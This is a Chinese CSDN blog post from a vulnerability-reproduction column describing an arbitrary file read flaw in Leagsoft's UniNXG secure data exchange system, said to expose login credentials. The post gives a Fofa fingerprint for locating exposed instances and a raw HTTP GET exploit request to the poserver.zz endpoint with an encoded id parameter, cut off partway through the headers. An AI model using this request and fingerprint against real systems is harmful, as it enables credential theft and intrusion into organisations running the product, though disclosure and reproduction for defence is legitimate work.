联软安全数据交换系统存在任意文件读取漏洞

今天晚上早睡觉

于 2024-03-04 13:09:13 发布

阅读量564

点赞数

分类专栏：漏洞复现文章标签： web安全

本文链接：https://blog.csdn.net/weixin_43567873/article/details/136449352

版权

漏洞复现专栏收录该内容

361 篇文章 143 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

联软科技的UniNXG安全数据交换系统被发现存在任意文件读取漏洞，允许攻击者获取登录凭证，影响所有版本。文章详细描述了漏洞情况并提供了复现步骤。

摘要由CSDN通过智能技术生成

简介

UniNXG安全数据交换系统是联软科技发明的，融合网络隔离、网盘和DLP技术于一体的专业产品，它同时支持多网交换，查杀毒、审计审批、文档追踪和水印功能，是解决用户网络隔离、网间及网内数据传输、交换、共享/分享、存储的理想安全设备，具有开创性意义。

漏洞描述

联软安全数据交换系统存在任意文件读取漏洞，攻击者可通过此漏洞获得登录账号密码，以进行后续测试。

影响版本

联软安全数据交换系统
Fofa:

icon_hash="1397838899"

漏洞复现

GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=